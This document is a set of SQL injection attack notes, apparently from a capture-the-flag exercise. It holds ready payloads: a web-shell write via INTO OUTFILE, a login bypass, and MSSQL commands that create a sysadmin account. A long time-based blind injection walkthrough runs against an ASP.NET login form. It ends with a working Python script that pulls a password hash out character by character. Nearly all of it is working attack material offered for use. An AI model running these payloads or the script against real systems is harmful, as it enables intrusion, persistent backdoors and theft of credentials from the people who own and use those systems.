sqli: common

  • MySQL RCE via file write (INTO OUTFILE is MySQL syntax, not PostgreSQL; it needs the FILE privilege, a secure_file_priv setting that permits the target directory, and a webroot the DB service account can write to — the XAMPP path below is a Windows example)
> ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'
  • common scenarios
# logic injection (authentication bypass: the always-true `or` predicate makes the WHERE clause match, and the trailing comment discards the rest of the original query)
> ' or '1'='1' --

# MSSQL: create a login and add it to the sysadmin server role (needs stacked queries and an already-privileged connection; sp_addsrvrolemember is deprecated — on SQL Server 2012+ use `ALTER SERVER ROLE sysadmin ADD MEMBER hacker`)
> create login hacker with password='password',default_database=[master]
> EXEC master..sp_addsrvrolemember @loginame = N'hacker', @rolename = N'sysadmin'
  • Find database type
# Microsoft SQL Server and MySQL (both answer @@version)
> SELECT @@version

# Oracle (a FROM clause is mandatory in Oracle; use `dual` when selecting bare expressions)
> SELECT * FROM v$version

# PostgreSQL
> SELECT version()

Resources

time-based blind sqli (MSSQL: WAITFOR DELAY in a stacked query after the closing quote; a response that comes back before the delay means the condition was false)

* check db name length
> admin1';IF len(db_name())=5 WAITFOR DELAY '00:00:5'--

* check string of db name
> admin1';IF substring(db_name(),1,1)='b' WAITFOR DELAY '00:00:5'--
`butch`

* get number of tables
> admin1';IF (select count(*) from information_schema.tables where TABLE_CATALOG='butch')=2 WAITFOR DELAY '00:00:5'--

* get first table name length (`top 1` without ORDER BY has no guaranteed order — add `order by table_name` to these probes so "first" stays stable between requests)
> admin1';IF (select top 1 len(table_name) from information_schema.tables where TABLE_CATALOG='butch')=5 WAITFOR DELAY '00:00:3'--

* get first table name
> admin1';IF (select top 1 table_name from information_schema.tables where TABLE_CATALOG='butch')='users' WAITFOR DELAY '00:00:3'--
`users`

* get number of cols in table
> admin1';IF (select count(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')=3 WAITFOR DELAY '00:00:3'--
`3`

* get first column name length
> admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')=3 WAITFOR DELAY '00:00:3'--
`7`

* guess first column name
admin1';IF (select top 1 substring(column_name,1,1) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')='a' WAITFOR DELAY '00:00:3'--
`user_id`

* guess second column name length
admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id')=3 WAITFOR DELAY '00:00:3'--
`8`

* guess second column name
admin1';IF (select top 1 column_name from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id')='username' WAITFOR DELAY '00:00:3'--
`username`

* guess third column name length
> admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id' and column_name!='username')=3 WAITFOR DELAY '00:00:3'--
`13`

* guess third column name
admin1';IF (select top 1 substring(column_name,1,4) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id' and column_name!='username')='user' WAITFOR DELAY '00:00:3'--
`password_hash`

* get number of rows in table (in MSSQL `butch.users` parses as schema.table, not database.table — use `butch.dbo.users`, or the bare table name in the current database as the second probe does)
admin1';IF (select count(user_id) from butch.users)=1 WAITFOR DELAY '00:00:3'--
admin'; IF (select count(*) from users)>0 WAITFOR DELAY '00:00:3';--
1

* get first username length
> admin'; IF (select top 1 len(username) from users)=5 WAITFOR DELAY '00:00:3';--
`5`

* get first password_hash length (64 characters is consistent with a hex-encoded SHA-256; verify once the value is recovered)
admin'; IF (select top 1 len(password_hash) from users)=64 WAITFOR DELAY '00:00:3';--
`64`
  • Create a script to recover the password_hash character by character with the probes above (assumes a lowercase hex alphabet; if no character matches at some position, widen the alphabet)
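import requests
import time

url = 'http://<ip>/default.aspx'
s = requests.Session()

# Initial GET so the session holds whatever cookie the app sets before the form is posted.
r = s.get(url)

# Candidate alphabet: lowercase hex. The length probe returned 64, which fits a hex digest.
# If no character matches at some position, widen this set (uppercase hex, base64, ...).
hash_chars = "abcdef0123456789"

DELAY = 3                # seconds requested by WAITFOR DELAY '00:00:3' in the payload
THRESHOLD = DELAY - 0.5  # extra round-trip time (over baseline) that counts as "delay fired"
TIMEOUT = 6 * DELAY      # hard cap so a stalled target cannot hang the extraction forever

# ASP.NET form fields captured from the served page; the hidden tokens must match that page.
FORM_STATIC = {
    "__VIEWSTATE": "/wEPDwUKLTQ0NDEwMDQ5MmRksS3kT9xVa5WcaOExJczybgwm5ag61c1aSJauWk+MueM=",
    "__VIEWSTATEGENERATOR": "CA0B0334",
    "__EVENTVALIDATION": "/wEdAAQlk/dmKT4Sorxxd/xByuYXG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6cSWj1jCV5XpbYX8jTlKxWkDqoWst7QvUmEJo+jB/FoQ=",
    "ctl00$ContentPlaceHolder1$PasswordTextBox": "",
    "ctl00$ContentPlaceHolder1$LoginButton": "Enter"
}


def post_timed(username):
    """POST the login form with `username` in the username field; return round-trip seconds.

    A request that hits TIMEOUT is reported as TIMEOUT seconds, i.e. it is counted as
    delayed. On a noisy target re-probe such hits rather than trusting a single sample.
    """
    data = dict(FORM_STATIC)
    data["ctl00$ContentPlaceHolder1$UsernameTextBox"] = username
    time_start = time.time()
    try:
        s.post(url, data=data, timeout=TIMEOUT)
    except requests.exceptions.Timeout:
        print("timeout after %ss (counted as delayed)" % TIMEOUT)
        return float(TIMEOUT)
    return time.time() - time_start


# Baseline round-trip with a non-injected username, so a slow target is not misread
# as a triggered delay. If jitter on the target approaches THRESHOLD, raise DELAY in
# the payload and in the constants above.
baseline = post_timed("admin")
print("baseline %.2fs" % baseline)

length = 1
value = ''
while length <= 64:
    matched = False
    for i in hash_chars:
        test = value + i
        payload = "admin'; IF (select top 1 substring(password_hash,1," + str(length) + ") from users)='" + test + "' WAITFOR DELAY '00:00:3';--"
        print(payload)
        elapse = post_timed(payload)
        print(elapse)
        if elapse - baseline >= THRESHOLD:
            value += i
            length += 1
            matched = True
            print(value)
            break  # only one character can match this position; do not waste requests
    if not matched:
        # Every candidate came back fast: wrong alphabet, expired session/tokens, or the
        # delay is being absorbed by the target. Stop instead of spinning on this position.
        raise SystemExit("no character matched at position %d (recovered so far: %r)" % (length, value))

print("password_hash: " + value)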